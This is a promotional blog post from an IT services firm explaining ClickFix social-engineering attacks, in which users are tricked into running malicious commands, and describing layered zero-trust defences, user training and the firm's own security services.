Phishing attacks are becoming more convincing and harder to spot as cyber criminals adapt to the increasing awareness around traditional attack vectors. It is for this reason why cyber criminals are changing many of their attack methods to attempt to avoid security tools.
Enter “ClickFix”, the latest way that Cyber Criminals are attempting to bypass traditional security controls. Rather than forcing their way into a system by attempting to launch a targeted attack or asking users to download an attachment in an email that would launch an attack (what would be blocked by most modern security tools), they are attempting to trick users into doing the work for them.
A ClickFix attack is a form of social engineering where a user is manipulated into manually running a malicious command. But why?
In short, most security tools do not look at the action of the user, only the files on the device. If the action of launching an attack is performed by the user, it often appears legitimate to security tools that do not follow the Zero Trust approach to Cyber Security, allowing malware to slip through undetected.
How Do ClickFix Attacks Work?
These attacks usually begin with a familiar attack vector, such as a phishing email, an online advert (Malvertising), or a compromised website.
The user is redirected to a convincing looking page that may display a document preview, fake login screen, error message, or request for “verification”. Prompts like “Fix this issue”, “Enable content”, “Log In to Access”, or “Verify you’re human” are often disguised as trusted services and are used to guide the user into taking action.
Once the user follows the instructions, malware is downloaded or remote access is granted onto the device. From there, attackers can begin exploiting access without raising immediate alarms. As far as your security tools are concerned, you gave permission to download files or grant remote access to your systems.
Once executed, the impact can be severe. Businesses may face credential or session theft, data exfiltration, unauthorised remote access, and attackers moving laterally across systems in an attempt to cause as much damage as possible. In some cases, persistent malware can remain hidden for long periods, monitoring activity, stealing data, with attackers waiting for the right moment to cause as much damage as possible.
How Businesses Can Protect Themselves
Defending against ClickFix requires more than a single security tool. It needs a layered “zero trust” approach to cyber security throughout your business.
Modern active email threat protection stops phishing attempts before users ever see them, using AI to analyse the content of an email and the intent behind them, including analysing links, sending addresses and attachments, to identify advanced threats.
Endpoint Detection & Response, paired with Zero Trust Endpoint Management, ensures that unusual, suspicious and malicious behaviour is detected quickly, even if a user has already interacted with something malicious.
However, it is important to remember that user awareness of modern threats is an important first part of every cyber defence strategy. Employees should understand that legitimate services will never ask them to run terminal/command prompt commands or complete unusual “fix” steps. Regular training on modern threats such as these significantly reduces the risk of these attacks succeeding.
How Can TwentyFour IT Services Protect Your Business?
TwentyFour IT Services supports businesses with a proactive, "zero trust” approach to cyber security throughout your business, which is designed to detect and prevent threats like ClickFix before they cause harm.
Our Advanced Email Threat Protection identifies and blocks suspicious communications using AI-driven analysis of content and intent. We combine this with continuous endpoint monitoring to detect unusual, suspicious and malicious activity and respond across your devices and network.
Alongside the technology and tools to protect your business from evolving and increasing threats, we also provide tailored cyber security training to ensure your team can recognise modern attack techniques and respond appropriately.
All of this is backed by our own team of cyber security experts in our 24/7/365 Cyber Security Operations Centre (CSOC) who are not only monitoring for potential threats on our clients but monitoring for industry trends so that we can adapt and protect our clients from immerging threats.
If you want to strengthen your defences against modern cyber threats, TwentyFour IT Services can help you build a more secure and resilient business, find out more by reaching out to our team and taking our free cyber security health check.